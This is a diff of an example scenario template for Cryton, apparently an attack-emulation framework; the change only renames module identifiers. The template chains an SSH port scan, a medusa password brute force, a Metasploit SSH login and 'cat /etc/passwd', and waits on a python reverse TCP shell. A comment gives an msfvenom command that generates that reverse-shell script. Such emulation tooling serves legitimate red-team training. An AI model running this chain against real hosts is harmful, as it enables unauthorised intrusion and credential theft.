examples/scenarios/advanced-example/template.yml (before)
---
# This is an advanced example of Step chaining. In this example we combine output sharing,
# MSFListener/HTTPListener triggers, execution variables, and sessions.
# Required modules: mod_nmap, mod_medusa, mod_msf, mod_cmd.
# To trigger the HTTPListener, use command "curl http://<worker_ip>:8082/index?test=test".
# To trigger the MSFListener, generate the script using `msfvenom` tool
# (msfvenom -p python/shell_reverse_tcp lhost=<Metasploit host's IP address> lport=4444 > r_shell.py) and execute the script.

plan:
  name: Advanced example
  owner: Cryton
  stages:
    - name: stage-get-etc-passwd
      trigger_type: delta
      trigger_args:
        seconds: 0
      steps:
        - name: check-ssh
          is_init: true
          step_type: worker/execute
          arguments:
            module: mod_nmap
            module_arguments:
              target: {{ target }}
              ports:
                - 22
          next:
            - type: result
              value: OK
              step: bruteforce
        - name: bruteforce
          step_type: worker/execute
          arguments:
            module: mod_medusa
            module_arguments:
              target: {{ target }}
              credentials:
                username: "{{ bruteforce.username }}"
                password: "{{ bruteforce.password }}"
          next:
            - type: result
              value: OK
              step: get-ssh-session
        - name: get-ssh-session
          step_type: worker/execute
          arguments:
            create_named_session: session_to_target_1
            module: mod_msf
            module_arguments:
              module_type: auxiliary
              module: scanner/ssh/ssh_login
              module_options:
                RHOSTS: {{ target }}
                USERNAME: $parent.username
                PASSWORD: $parent.password
          next:
            - type: result
              value: OK
              step: session-cmd
        - name: session-cmd
          step_type: worker/execute
          arguments:
            use_named_session: session_to_target_1
            module: mod_cmd
            module_arguments:
              cmd: cat /etc/passwd

    - name: stage-http
      depends_on:
        - stage-get-etc-passwd
      trigger_type: HTTPListener
      trigger_args:
        host: 0.0.0.0
        port: 8082
        routes:
          - path: /index
            method: GET
            parameters:
              - name: test
                value: test
      steps:
        - name: execute-command
          is_init: true
          step_type: worker/execute
          arguments:
            module: mod_cmd
            module_arguments:
              cmd: echo "it works!"

    - name: stage-msf
      depends_on:
        - stage-http
      trigger_type: MSFListener
      trigger_args:
        identifiers:
          via_exploit: exploit/multi/handler
          via_payload: payload/python/shell_reverse_tcp
        exploit: multi/handler
        payload: python/shell_reverse_tcp
        payload_arguments:
          LHOST: {{ metasploit_host_address }}
          LPORT: 4444
      steps:
        - name: execute-in-session
          is_init: true
          step_type: worker/execute
          arguments:
            use_named_session: stage-msf_session
            module: mod_cmd
            module_arguments:
              cmd: whoami

examples/scenarios/advanced-example/template.yml (after)
---
# This is an advanced example of Step chaining. In this example we combine output sharing,
# MSFListener/HTTPListener triggers, execution variables, and sessions.
# Required modules: nmap, medusa, metasploit, command.
# To trigger the HTTPListener, use command "curl http://<worker_ip>:8082/index?test=test".
# To trigger the MSFListener, generate the script using `msfvenom` tool
# (msfvenom -p python/shell_reverse_tcp lhost=<Metasploit host's IP address> lport=4444 > r_shell.py) and execute the script.

plan:
  name: Advanced example
  owner: Cryton
  stages:
    - name: stage-get-etc-passwd
      trigger_type: delta
      trigger_args:
        seconds: 0
      steps:
        - name: check-ssh
          is_init: true
          step_type: worker/execute
          arguments:
            module: nmap
            module_arguments:
              target: {{ target }}
              ports:
                - 22
          next:
            - type: result
              value: OK
              step: bruteforce
        - name: bruteforce
          step_type: worker/execute
          arguments:
            module: medusa
            module_arguments:
              target: {{ target }}
              credentials:
                username: "{{ bruteforce.username }}"
                password: "{{ bruteforce.password }}"
          next:
            - type: result
              value: OK
              step: get-ssh-session
        - name: get-ssh-session
          step_type: worker/execute
          arguments:
            create_named_session: session_to_target_1
            module: metasploit
            module_arguments:
              module_type: auxiliary
              module: scanner/ssh/ssh_login
              module_options:
                RHOSTS: {{ target }}
                USERNAME: $parent.username
                PASSWORD: $parent.password
          next:
            - type: result
              value: OK
              step: session-cmd
        - name: session-cmd
          step_type: worker/execute
          arguments:
            use_named_session: session_to_target_1
            module: command
            module_arguments:
              cmd: cat /etc/passwd

    - name: stage-http
      depends_on:
        - stage-get-etc-passwd
      trigger_type: HTTPListener
      trigger_args:
        host: 0.0.0.0
        port: 8082
        routes:
          - path: /index
            method: GET
            parameters:
              - name: test
                value: test
      steps:
        - name: execute-command
          is_init: true
          step_type: worker/execute
          arguments:
            module: command
            module_arguments:
              cmd: echo "it works!"

    - name: stage-msf
      depends_on:
        - stage-http
      trigger_type: MSFListener
      trigger_args:
        identifiers:
          via_exploit: exploit/multi/handler
          via_payload: payload/python/shell_reverse_tcp
        exploit: multi/handler
        payload: python/shell_reverse_tcp
        payload_arguments:
          LHOST: {{ metasploit_host_address }}
          LPORT: 4444
      steps:
        - name: execute-in-session
          is_init: true
          step_type: worker/execute
          arguments:
            use_named_session: stage-msf_session
            module: command
            module_arguments:
              cmd: whoami

examples/scenarios/advanced-example/template.yml (diff)
@@ -1,7 +1,7 @@
 ---
 # This is an advanced example of Step chaining. In this example we combine output sharing,
 # MSFListener/HTTPListener triggers, execution variables, and sessions.
-# Required modules: mod_nmap, mod_medusa, mod_msf, mod_cmd.
+# Required modules: nmap, medusa, metasploit, command.
 # To trigger the HTTPListener, use command "curl http://<worker_ip>:8082/index?test=test".
 # To trigger the MSFListener, generate the script using `msfvenom` tool
 # (msfvenom -p python/shell_reverse_tcp lhost=<Metasploit host's IP address> lport=4444 > r_shell.py) and execute the script.
@@ -19,7 +19,7 @@ plan:
           is_init: true
           step_type: worker/execute
           arguments:
-            module: mod_nmap
+            module: nmap
             module_arguments:
               target: {{ target }}
               ports:
@@ -31,7 +31,7 @@ plan:
         - name: bruteforce
           step_type: worker/execute
           arguments:
-            module: mod_medusa
+            module: medusa
             module_arguments:
               target: {{ target }}
               credentials:
@@ -45,7 +45,7 @@ plan:
           step_type: worker/execute
           arguments:
             create_named_session: session_to_target_1
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: auxiliary
               module: scanner/ssh/ssh_login
@@ -61,7 +61,7 @@ plan:
           step_type: worker/execute
           arguments:
             use_named_session: session_to_target_1
-            module: mod_cmd
+            module: command
             module_arguments:
               cmd: cat /etc/passwd
 
@@ -83,7 +83,7 @@ plan:
           is_init: true
           step_type: worker/execute
           arguments:
-            module: mod_cmd
+            module: command
             module_arguments:
               cmd: echo "it works!"
 
@@ -106,6 +106,6 @@ plan:
           step_type: worker/execute
           arguments:
             use_named_session: stage-msf_session
-            module: mod_cmd
+            module: command
             module_arguments:
               cmd: whoami
